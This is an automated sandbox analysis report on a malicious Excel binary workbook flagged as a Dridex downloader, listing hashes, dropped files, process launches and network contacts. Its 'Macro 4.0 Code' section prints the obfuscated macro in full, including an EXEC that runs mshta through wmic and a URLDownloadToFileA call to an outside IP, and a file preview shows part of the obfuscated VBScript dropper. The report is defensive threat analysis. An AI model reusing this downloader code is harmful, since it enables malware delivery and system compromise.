                                                                                                                                                    Sample file name:request-0132311.xlsb
                                                                                                                                                    Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                    Run name:Potential for more IOCs and behavior
                                                                                                                                                    Number of analysed new started processes analysed:29
                                                                                                                                                    Number of new started drivers analysed:0
                                                                                                                                                    Number of existing processes analysed:0
                                                                                                                                                    Number of existing drivers analysed:0
                                                                                                                                                    Number of injected processes analysed:0
                                                                                                                                                    Technologies:
                                                                                                                                                    • HCA enabled
                                                                                                                                                    • EGA enabled
                                                                                                                                                    • HDC enabled
                                                                                                                                                    • AMSI enabled
                                                                                                                                                    Analysis Mode:default
                                                                                                                                                    Analysis stop reason:Timeout
                                                                                                                                                    Detection:MAL
                                                                                                                                                    Classification:mal92.troj.expl.evad.winXLSB@5/6@0/1
                                                                                                                                                    EGA Information:Failed
                                                                                                                                                    HDC Information:Failed
                                                                                                                                                    HCA Information:
                                                                                                                                                    • Successful, ratio: 100%
                                                                                                                                                    • Number of executed functions: 0
                                                                                                                                                    • Number of non-executed functions: 0
                                                                                                                                                    Cookbook Comments:
                                                                                                                                                    • Adjust boot time
                                                                                                                                                    • Enable AMSI
                                                                                                                                                    • Found application associated with file extension: .xlsb
                                                                                                                                                    • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                    • Attach to Office via COM
                                                                                                                                                    • Active AutoShape Object
                                                                                                                                                    • Active Picture Object
                                                                                                                                                    • Active Picture Object
                                                                                                                                                    • Scroll down
                                                                                                                                                    • Close Viewer
                                                                                                                                                    Warnings:
                                                                                                                                                    Show All
                                                                                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, HxTsr.exe, RuntimeBroker.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                                                                                                                    • Excluded IPs from analysis (whitelisted): 92.122.145.220, 52.109.32.63, 52.109.8.25, 52.109.12.23
                                                                                                                                                    • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, prod-w.nexus.live.com.akadns.net, prod.configsvc1.live.com.akadns.net, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, store-images.s-microsoft.com, config.officeapps.live.com, nexus.officeapps.live.com, displaycatalog.mp.microsoft.com, officeclient.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, europe.configsvc1.live.com.akadns.net
                                                                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                    • Report size getting too big, too many NtSetInformationFile calls found.

                                                                                                                                                    Simulations

                                                                                                                                                    Behavior and APIs

                                                                                                                                                    TimeTypeDescription
                                                                                                                                                    12:47:21API Interceptor1x Sleep call for process: WMIC.exe modified
                                                                                                                                                    12:47:24API Interceptor1x Sleep call for process: mshta.exe modified

                                                                                                                                                    Joe Sandbox View / Context

                                                                                                                                                    IPs

                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                    136.144.181.174invoice.xlsbGet hashmaliciousBrowse
                                                                                                                                                      invoice.xlsbGet hashmaliciousBrowse
                                                                                                                                                        license-08084746.xlsbGet hashmaliciousBrowse
                                                                                                                                                          license-08084746.xlsbGet hashmaliciousBrowse
                                                                                                                                                            hunt25640035.xlsbGet hashmaliciousBrowse
                                                                                                                                                              hunt25640035.xlsbGet hashmaliciousBrowse
                                                                                                                                                                Sale-8799306.xlsbGet hashmaliciousBrowse
                                                                                                                                                                  03332955311591163552.xlsbGet hashmaliciousBrowse
                                                                                                                                                                    license517502.xlsbGet hashmaliciousBrowse
                                                                                                                                                                      03332955311591163552.xlsbGet hashmaliciousBrowse
                                                                                                                                                                        license517502.xlsbGet hashmaliciousBrowse
                                                                                                                                                                          942830.xlsbGet hashmaliciousBrowse
                                                                                                                                                                            promo code83874071.xlsbGet hashmaliciousBrowse
                                                                                                                                                                              promo code83874071.xlsbGet hashmaliciousBrowse
                                                                                                                                                                                vote number3210109.xlsbGet hashmaliciousBrowse
                                                                                                                                                                                  tax77567960.xlsbGet hashmaliciousBrowse
                                                                                                                                                                                    hunting license-25331.xlsbGet hashmaliciousBrowse
                                                                                                                                                                                      vote number3210109.xlsbGet hashmaliciousBrowse
                                                                                                                                                                                        tax77567960.xlsbGet hashmaliciousBrowse

                                                                                                                                                                                          Domains

                                                                                                                                                                                          No context

                                                                                                                                                                                          ASN

                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                          TRANSIP-ASAmsterdamtheNetherlandsNLrequest-0132311.xlsbGet hashmaliciousBrowse
                                                                                                                                                                                          • 136.144.181.174
                                                                                                                                                                                          invoice.xlsbGet hashmaliciousBrowse
                                                                                                                                                                                          • 136.144.181.174
                                                                                                                                                                                          invoice.xlsbGet hashmaliciousBrowse
                                                                                                                                                                                          • 136.144.181.174
                                                                                                                                                                                          license-08084746.xlsbGet hashmaliciousBrowse
                                                                                                                                                                                          • 136.144.181.174
                                                                                                                                                                                          license-08084746.xlsbGet hashmaliciousBrowse
                                                                                                                                                                                          • 136.144.181.174
                                                                                                                                                                                          hunt25640035.xlsbGet hashmaliciousBrowse
                                                                                                                                                                                          • 136.144.181.174
                                                                                                                                                                                          hunt25640035.xlsbGet hashmaliciousBrowse
                                                                                                                                                                                          • 136.144.181.174
                                                                                                                                                                                          Sale-8799306.xlsbGet hashmaliciousBrowse
                                                                                                                                                                                          • 136.144.181.174
                                                                                                                                                                                          03332955311591163552.xlsbGet hashmaliciousBrowse
                                                                                                                                                                                          • 136.144.181.174
                                                                                                                                                                                          license517502.xlsbGet hashmaliciousBrowse
                                                                                                                                                                                          • 136.144.181.174
                                                                                                                                                                                          03332955311591163552.xlsbGet hashmaliciousBrowse
                                                                                                                                                                                          • 136.144.181.174
                                                                                                                                                                                          license517502.xlsbGet hashmaliciousBrowse
                                                                                                                                                                                          • 136.144.181.174
                                                                                                                                                                                          942830.xlsbGet hashmaliciousBrowse
                                                                                                                                                                                          • 136.144.181.174
                                                                                                                                                                                          promo code83874071.xlsbGet hashmaliciousBrowse
                                                                                                                                                                                          • 136.144.181.174
                                                                                                                                                                                          promo code83874071.xlsbGet hashmaliciousBrowse
                                                                                                                                                                                          • 136.144.181.174
                                                                                                                                                                                          vote number3210109.xlsbGet hashmaliciousBrowse
                                                                                                                                                                                          • 136.144.181.174
                                                                                                                                                                                          tax77567960.xlsbGet hashmaliciousBrowse
                                                                                                                                                                                          • 136.144.181.174
                                                                                                                                                                                          hunting license-25331.xlsbGet hashmaliciousBrowse
                                                                                                                                                                                          • 136.144.181.174
                                                                                                                                                                                          vote number3210109.xlsbGet hashmaliciousBrowse
                                                                                                                                                                                          • 136.144.181.174
                                                                                                                                                                                          tax77567960.xlsbGet hashmaliciousBrowse
                                                                                                                                                                                          • 136.144.181.174

                                                                                                                                                                                          JA3 Fingerprints

                                                                                                                                                                                          No context

                                                                                                                                                                                          Dropped Files

                                                                                                                                                                                          No context

                                                                                                                                                                                          Created / dropped Files

                                                                                                                                                                                          C:\ProgramData\vULADISfrveNTj.rtf
                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                          File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):4804
                                                                                                                                                                                          Entropy (8bit):5.059292049596848
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:96:FdBjMAD8mQfTZYgZAO1HV9gboHzKJAuA4dEbA:FdBjMK8mMNpZnPgA74dsA
                                                                                                                                                                                          MD5:3774BB5E5C7846AD84A463FFDEA4D2DC
                                                                                                                                                                                          SHA1:0A7FAEF6AD785E16555BD4577D6446A10C7E68D7
                                                                                                                                                                                          SHA-256:6CFC58E1AE811CB8DF59B5E26F85FF4D8C1956C3F64C8AF4929EC4CA6FF03724
                                                                                                                                                                                          SHA-512:DC6C317D548523109352F838A868905548E539CC6CDFEC565F92B40B3DA6EEE794A4EBBC7E42FF27941AA44530CD28024E375DC66961F6DC97C1966E7CDCF3B2
                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                          Yara Hits:
                                                                                                                                                                                          • Rule: JoeSecurity_DridexDownloader, Description: Yara detected Dridex Downloader, Source: C:\ProgramData\vULADISfrveNTj.rtf, Author: Joe Security
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          Preview: <!DOCTYPE html>..<html>..<head>..<HTA:APPLICATION ID="CS"..APPLICATIONNAME="ttrgnkrtegjtjgjerg"..WINDOWSTATE="minimize"..MAXIMIZEBUTTON="no"..MINIMIZEBUTTON="no"..CAPTION="no"..SHOWINTASKBAR="no">..<script type="text/vbscript" LANGUAGE="VBScript" >..Y_j_a_I_Y_w_k_c_G_z = Chr(114+1-1) & "und" & "ll" & "32." & "" & Chr(101+1-1) & Chr(120+1-1) & "e " & "" & "C:\" & "\Pr" & Chr(111+1-1) & "gra" & "mDa" & "ta\" & "qqn" & Chr(105+1-1) & "gge" & Chr(114+1-1) & Chr(46+1-1) & "" & "bi" & "n " & Chr(68+1-1) & "ll" & Chr(82+1-1) & Chr(101+1-1) & "gis" & "" & "ter" & "Ser" & "ver"..Set g_J_u_G_E_n_b_k_q_b_u = CreateObject("MSX" & Chr(77+1-1) & "" & "L2." & "Ser" & Chr(118+1-1) & "er" & "" & "XML" & "HT" & "" & "TP" & ".6." & Chr(48+1-1))....Y_a_l_U_C_F_c_R_W = "" & Chr(87+1-1) & Chr(115+1-1) & "cr" & "ip" & "" & Chr(116+1-1) & Chr(46+1-1) & Chr(83+1-1) & "" & "" & "hel" & "" & Chr(108+1-1)..Set l_A_o_J_e_o_G_Y_F_p_O_E_f = CreateObject(Y_a_l_U_C_F_c_R_W)..v_G_M_X_r_X_x_a = LCase(l_A_o_J_e_o_G_Y_F_p
                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E
                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                          File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):140163
                                                                                                                                                                                          Entropy (8bit):5.35816822090864
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:1536:tcQIfgxrBdA3gBwtnQ9DQW+zCb4Ff7nXbovidXiE6LWmE9:3uQ9DQW+zJXfH
                                                                                                                                                                                          MD5:07409DFAC5671F0716042B4F6AD0E465
                                                                                                                                                                                          SHA1:5C3A8B1CA34370D50D2311EAF5336B01A538B94A
                                                                                                                                                                                          SHA-256:AD272185462BDC7E3DF06D6B8FF7CBB549E37DF725911F38CC9310A66CC87E7C
                                                                                                                                                                                          SHA-512:CAE40AA3C29A765D25D580B68487E7C188750A58197D4F1CD3767D3C1D99292A2A7A6E7262801A3836601BBFDA01C60C758B9C81B3EF33705C93C49D3E043BA0
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-11-25T11:46:28">.. Build: 16.0.14715.30527-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\3DD64742.png
                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                          File Type:PNG image data, 284 x 58, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):2295
                                                                                                                                                                                          Entropy (8bit):7.858135112374714
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:48:i5s85s+Q/U3ePlmmGUzUr52d2VPmRatEBSNHeUD4OCRdDJAq5s85s85sf:hr+n3dMzUr5zVOEeBseUdo6rrf
                                                                                                                                                                                          MD5:6ADAECE7AB0ED8730E76534572A1A658
                                                                                                                                                                                          SHA1:8AC129DA4A48859EF0D28C7B1AC9662069CCDBF5
                                                                                                                                                                                          SHA-256:4569E40F2046D8D63AAC30331F8D407EA2AB664EA9EF3A270CB7BD99C9749BD0
                                                                                                                                                                                          SHA-512:7607D0ACE96C520B59313DF7BB179FF8720B511AA0ED45CF177333C6B89B428C25C4F9CD9F481C9F5C55F81B90D6DE06C531893BCC4889F254A29B23F31A4450
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          Preview: .PNG........IHDR.......:.......q(....IDATx...{PSW...o.$.(AT".Hx......n.>+..G\w...v\..ci}..ujuk;vfu......H).X.HQ@...$<..K....$..;....D;;...3..srr..s.A.w.t.B..?......BE.g.*B8.P.......(T.pF.".3..!.Q...BE.g.*B8.P.......(T.pF.".3..!.Q...BE.g.*B8.P.......\......g...z..........2.....j.X*....V....b...M}.0......08q...-o].*......gv.....yp.....@...RQ.H,.......P....fu../.......w.W.....".c7...d.{W{....a.Z3`..M...Z......].VG.L.u..r....if.I8a..\...U'R.-;t !~.....q...T.Y...........p.T...Y[t...1Be..9....1A......Db1......\.x.._D.$..\.RWww..=..u...?l;....6........%.sd..R.OhH......xy...q...{..&..Sf...s=[3\......b....Y..F...7.......r.3T..l{.I./......@..7!..E.I"Q..B....M....'.9..83>.."..h.T..PS.t.J.V..[.:.......[........p..;0 i....I...<.t.g..q.r.3...}#..l{c.D.w`@.%.........qY.L_....Ty...fo......,0p.......5.;..0..)3...>.......z...3..7|.....n....i...;.`..a5].V.2v...Tj......n...&DE..;.@.....3X[.h..c..e...l...kgU.I..Q.R....Fv........8..--M......V.D.
                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\79B7EA5B.png
                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                          File Type:PNG image data, 224 x 317, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):47905
                                                                                                                                                                                          Entropy (8bit):7.975097307731708
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:768:oPiBEX9M11Q3TUZg7EZ52/ViBN3SH8WsqnxyZI1FLyGuH32MRbYgB1ZQ0ZoKABAG:oPrX6Q3cWViBN3yKqxyeHw3vRMgF3oK+
                                                                                                                                                                                          MD5:3773A459C89CC2480156FE604D3C5A5D
                                                                                                                                                                                          SHA1:3E2C5867A9670C6FDF65C156FDF6DE7F0A43A018
                                                                                                                                                                                          SHA-256:96E1EF7E454640575D72ED2B6C16843E44AEDF3BB6C47513DF78E4679CF4881F
                                                                                                                                                                                          SHA-512:82383A4DF8ADF2A8521214993112D238BB72792BDB078B0BFE6CDD5CE16F5CA5305BB4ED162F0F0749C3A5EAB5CB929BD1E4B50360A02F13A58593514FAA51E7
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:moderate, very likely benign file
                                                                                                                                                                                          Preview: .PNG........IHDR.......=.......n....JiCCPICC Profile..x..W.TS...[RIh..H...R.K..E..*..I ...D....]D@].U.E...ZQ...]......l..I.]=...s........{g...I.....y.|Y|D.kBj.......Z...x|...........7..../.(......'.... q.g...<......|..>Po=#_.. 6...!.*q...(q..W.l..9....L..dY.h7C=....y.o@.*..%..!..x..#!...7M...p...'....C.<^..V..r.X.....?..%/W1...6.H.......F.(%.A.#...X..wb...b.*RD&..QS...k.....x.Q..B......32..\...A....D..EByX...F6->v.g.8l....L.Wi.R.............D.).1j.89.bm...(..fS$.........m ..J"B...LYx..^.'...[$.sc4.*_........7..Y(a'.......s..C..c...$M.X.4?$^3..47Nc.S...J......\<0..H5?.#.KT.gd......A4..P....2.4....=M=.z$....d.!p.h.g..F$...._...|h^.jT.....V.t..........<..r.o.j.d.[2x.5...a...)...&Z.Q..t.-.a.Pb$1.....?.......>..`._..........N...b.7...8..=.kr..:g...z.!x...8.7...h..A.P..D...[....U.5v.W.J.F..8|;S.I.s.EY.+..5c.....o.s.....Q.Zb..}X.v.;.....;.5c..J<....V..xU<9.G..?....r.z.n..|a....8.3e.,Q>....B.W..9........;.~M.b.......]q............8........Z..
                                                                                                                                                                                          C:\Users\user\Desktop\~$request-0132311.xlsb
                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                          File Type:data
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):165
                                                                                                                                                                                          Entropy (8bit):1.6081032063576088
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:3:RFXI6dtt:RJ1
                                                                                                                                                                                          MD5:7AB76C81182111AC93ACF915CA8331D5
                                                                                                                                                                                          SHA1:68B94B5D4C83A6FB415C8026AF61F3F8745E2559
                                                                                                                                                                                          SHA-256:6A499C020C6F82C54CD991CA52F84558C518CBD310B10623D847D878983A40EF
                                                                                                                                                                                          SHA-512:A09AB74DE8A70886C22FB628BDB6A2D773D31402D4E721F9EE2F8CCEE23A569342FEECF1B85C1A25183DD370D1DFFFF75317F628F9B3AA363BBB60694F5362C7
                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                          Reputation:high, very likely benign file
                                                                                                                                                                                          Preview: .pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                                          \Device\ConDrv
                                                                                                                                                                                          Process:C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                                                          File Type:ASCII text, with CRLF, CR line terminators
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):160
                                                                                                                                                                                          Entropy (8bit):5.095703110114614
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:3:YwM2FgCKGWMRX1eRHXWXKSovrj4WA3iygK5k3koZ3Pveys1MgmsdeoO6JQAiveyn:Yw7gJGWMXJXKSOdYiygKkXe/egmsdNeF
                                                                                                                                                                                          MD5:180ADFE5A9846ADE966B75140ED563E7
                                                                                                                                                                                          SHA1:9B24C0BA0DCAB30DF912245903442DCD83DA8BC6
                                                                                                                                                                                          SHA-256:237E3A28614E2E406550D3394C61825EABCE4DB4846532F4922C68862953D6C0
                                                                                                                                                                                          SHA-512:52A157BF3991627CE3E1FB2169EA8878C5CFA2723A1C6C9F0883AD4F2955E6D81626805324228F45464C8EF13B9B1EFF91E50569F80F3B746849B74D66AEE686
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview: Executing (Win32_Process)->Create()...Method execution successful....Out Parameters:..instance of __PARAMETERS..{...ProcessId = 4988;...ReturnValue = 0;..};....

                                                                                                                                                                                          Static File Info

                                                                                                                                                                                          General

                                                                                                                                                                                          File type:Microsoft Excel 2007+
                                                                                                                                                                                          Entropy (8bit):7.899514909773616
                                                                                                                                                                                          TrID:
                                                                                                                                                                                          • Excel Microsoft Office Open XML Format document with Macro (51004/1) 36.56%
                                                                                                                                                                                          • Microsoft Excel Office Binary workbook document (40504/1) 29.03%
                                                                                                                                                                                          • Excel Microsoft Office Open XML Format document (40004/1) 28.67%
                                                                                                                                                                                          • ZIP compressed archive (8000/1) 5.73%
                                                                                                                                                                                          File name:request-0132311.xlsb
                                                                                                                                                                                          File size:79110
                                                                                                                                                                                          MD5:1479f6bfc2c47932d8eee6cf4db5c7f4
                                                                                                                                                                                          SHA1:7594bd2fb1fa9005662ece3c490fe80d28463e2c
                                                                                                                                                                                          SHA256:38e36a6b7bf101f5a8ddfb13756b8975413c91bad1828f83258afa6e564f1c32
                                                                                                                                                                                          SHA512:3061711696e16620779bb9120c40657f508ba4820ed69a520a227e2f4c1ba69826ba92640c24f14c4086ac7bd2c183f1881308d3c21120311c44a83f8fb349f7
                                                                                                                                                                                          SSDEEP:1536:UWJPrX6Q3cWViBN3yKqxyeHw3vRMgF3oKy5h8HXv6Dyrirr1gdd:VVqmc3/q0dfaguKygXvYyrirr1gdd
                                                                                                                                                                                          File Content Preview:PK..........!...l.....W.......[Content_Types].xml ...(.........................................................................................................................................................................................................

                                                                                                                                                                                          File Icon

                                                                                                                                                                                          Icon Hash:74f0d0d2c6d6d0f4

                                                                                                                                                                                          Static OLE Info

                                                                                                                                                                                          General

                                                                                                                                                                                          Document Type:OpenXML
                                                                                                                                                                                          Number of OLE Files:1

                                                                                                                                                                                          OLE File "request-0132311.xlsb"

                                                                                                                                                                                          Indicators

                                                                                                                                                                                          Has Summary Info:
                                                                                                                                                                                          Application Name:
                                                                                                                                                                                          Encrypted Document:
                                                                                                                                                                                          Contains Word Document Stream:
                                                                                                                                                                                          Contains Workbook/Book Stream:
                                                                                                                                                                                          Contains PowerPoint Document Stream:
                                                                                                                                                                                          Contains Visio Document Stream:
                                                                                                                                                                                          Contains ObjectPool Stream:
                                                                                                                                                                                          Flash Objects Count:
                                                                                                                                                                                          Contains VBA Macros:

                                                                                                                                                                                          Macro 4.0 Code

                                                                                                                                                                                          0,564,=FOPEN("C:\Pro" & CHAR(103) & "ra" & CHAR(109) & CHAR(68) & CHAR(97) & "ta\vULADISfrveNTj.rt" & CHAR(102), 3)
                                                                                                                                                                                          1,564,=C5835+A7213
                                                                                                                                                                                          3,564,=B8446+B2178
                                                                                                                                                                                          4,564,=A8517+B1384
                                                                                                                                                                                          10,564,=C1152+C6066
                                                                                                                                                                                          13,564,=FOR.CELL("SeXLCYfeLdqaYT",Sheet1!CH170:CK1370, TRUE)
                                                                                                                                                                                          14,564,=D3171+A2702
                                                                                                                                                                                          15,564,=C1615+D4355
                                                                                                                                                                                          17,564,=B6324+B7098
                                                                                                                                                                                          18,564,=D2084+C923
                                                                                                                                                                                          19,564,=B8680+B595
                                                                                                                                                                                          22,564,=C8358+A7087
                                                                                                                                                                                          23,564,=A3086+C7272
                                                                                                                                                                                          25,564,=B1110+D1197
                                                                                                                                                                                          27,564,=A1928+C2040
                                                                                                                                                                                          28,564,=FWRITE(0,CHAR(SeXLCYfeLdqaYT))
                                                                                                                                                                                          32,564,=C4578+D7477
                                                                                                                                                                                          33,564,=C8320+B1422
                                                                                                                                                                                          35,564,=A8605+A5601
                                                                                                                                                                                          36,564,=C9013+D8034
                                                                                                                                                                                          37,564,=D457+A1230
                                                                                                                                                                                          42,564,=NEXT()
                                                                                                                                                                                          44,564,=A4174+C8463
                                                                                                                                                                                          45,564,=C8491+B4568
                                                                                                                                                                                          49,564,=B9406+B2655
                                                                                                                                                                                          50,564,=C2298+D8440
                                                                                                                                                                                          51,564,=A5216+A6909
                                                                                                                                                                                          52,564,=A8663+D6737
                                                                                                                                                                                          54,564,=A5799+B6026
                                                                                                                                                                                          57,564,=EXEC(CHAR(119) & "mic proc" & CHAR(101) & "ss call" & CHAR(32) & "create" & CHAR(32) & CHAR(34) & "mshta C:\Progr" & CHAR(97) & "mData\vULADISfr" & CHAR(118) & "eNTj.r" & CHAR(116) & CHAR(102) & "" & CHAR(34) & "")
                                                                                                                                                                                          60,564,=D7139+C814
                                                                                                                                                                                          61,564,=D240+B4681
                                                                                                                                                                                          62,564,=A1760+A9875
                                                                                                                                                                                          63,564,=D6796+A3632
                                                                                                                                                                                          64,564,=A4005+D9807
                                                                                                                                                                                          66,564,=A6544+B7529
                                                                                                                                                                                          67,564,=C4170+D5127
                                                                                                                                                                                          69,564,=B4234+D2646
                                                                                                                                                                                          71,564,=CALL("urlmo" & CHAR(110), "URLDownloadTo" & CHAR(70) & "ileA","" & CHAR(74) & "JCCJJ", 0, CHAR(104) & "ttp" & CHAR(58) & "//" & CHAR(49) & CHAR(51) & "6.144." & CHAR(49) & "81" & CHAR(46) & "174:8" & CHAR(48) & "80/Q2" & CHAR(87) & "5VWUFL5VCMQ7" & CHAR(74) & "QPETG3CC" & CHAR(84) & "YX72Z4R25" & CHAR(80) & CHAR(68) & CHAR(71), "C:" & CHAR(92) & CHAR(80) & "rogra" & CHAR(109) & "Data\vDgIskgmrTd" & CHAR(69) & "Ub.txt",0,0)
                                                                                                                                                                                          73,564,=C5537+D9236
                                                                                                                                                                                          74,564,=D6643+A1071
                                                                                                                                                                                          76,564,=A7092+A3312
                                                                                                                                                                                          78,564,=A8313+D7781
                                                                                                                                                                                          80,564,=A3250+A508
                                                                                                                                                                                          84,564,=A5147+C8759
                                                                                                                                                                                          85,564,=ALERT(CHAR(69) & "rr" & CHAR(111) & CHAR(114) & "! Send" & CHAR(105) & CHAR(110) & "g rep" & CHAR(111) & "rt to " & CHAR(77) & CHAR(105) & "croso" & CHAR(102) & "t." & CHAR(46) & CHAR(46))
                                                                                                                                                                                          90,564,=A3353+B8550
                                                                                                                                                                                          91,564,=B6248+B2087
                                                                                                                                                                                          92,564,=A3036+D8832
                                                                                                                                                                                          93,564,=B7866+B1376
                                                                                                                                                                                          95,564,=A934+B7296
                                                                                                                                                                                          96,564,=B6168+A5688
                                                                                                                                                                                          99,564,=A5209+B6172
                                                                                                                                                                                          100,564,=FOPEN("C:\ProgramD" & CHAR(97) & "ta\vDgIskgmrTdEUb.txt",1)
                                                                                                                                                                                          103,564,=B5787+C5048
                                                                                                                                                                                          105,564,=D8579+C5977
                                                                                                                                                                                          106,564,=C9647+A9367
                                                                                                                                                                                          109,564,=A2240+D8397
                                                                                                                                                                                          110,564,=C5153+C3092
                                                                                                                                                                                          111,564,=B4256+A5032
                                                                                                                                                                                          113,564,=D8071+C3585
                                                                                                                                                                                          114,564,=SEND.MAIL(EVALUATE(FREAD(US101,255)))
                                                                                                                                                                                          116,564,=D9781+C238
                                                                                                                                                                                          117,564,=D1056+D7962
                                                                                                                                                                                          119,564,=B4585+A2967
                                                                                                                                                                                          121,564,=D2821+D381
                                                                                                                                                                                          122,564,=B7198+C7967
                                                                                                                                                                                          123,564,=D1203+C6661
                                                                                                                                                                                          125,564,=A9399+B611
                                                                                                                                                                                          126,564,=B2222+D7652
                                                                                                                                                                                          129,564,=RETURN()
                                                                                                                                                                                          

                                                                                                                                                                                          Network Behavior

                                                                                                                                                                                          Network Port Distribution

                                                                                                                                                                                          TCP Packets

                                                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                          Nov 25, 2021 12:47:21.358192921 CET497818080192.168.2.5136.144.181.174
                                                                                                                                                                                          Nov 25, 2021 12:47:21.385868073 CET808049781136.144.181.174192.168.2.5
                                                                                                                                                                                          Nov 25, 2021 12:47:21.970773935 CET497818080192.168.2.5136.144.181.174
                                                                                                                                                                                          Nov 25, 2021 12:47:21.998359919 CET808049781136.144.181.174192.168.2.5
                                                                                                                                                                                          Nov 25, 2021 12:47:22.658227921 CET497818080192.168.2.5136.144.181.174
                                                                                                                                                                                          Nov 25, 2021 12:47:22.685894012 CET808049781136.144.181.174192.168.2.5

                                                                                                                                                                                          Code Manipulations

                                                                                                                                                                                          Statistics

                                                                                                                                                                                          Behavior

                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                          System Behavior

                                                                                                                                                                                          General

                                                                                                                                                                                          Start time:12:46:26
                                                                                                                                                                                          Start date:25/11/2021
                                                                                                                                                                                          Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                          Commandline:"C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding
                                                                                                                                                                                          Imagebase:0xda0000
                                                                                                                                                                                          File size:27110184 bytes
                                                                                                                                                                                          MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Reputation:high

                                                                                                                                                                                          General

                                                                                                                                                                                          Start time:12:47:20
                                                                                                                                                                                          Start date:25/11/2021
                                                                                                                                                                                          Path:C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                          Commandline:wmic process call create "mshta C:\ProgramData\vULADISfrveNTj.rtf"
                                                                                                                                                                                          Imagebase:0x3a0000
                                                                                                                                                                                          File size:391680 bytes
                                                                                                                                                                                          MD5 hash:79A01FCD1C8166C5642F37D1E0FB7BA8
                                                                                                                                                                                          Has elevated privileges:true
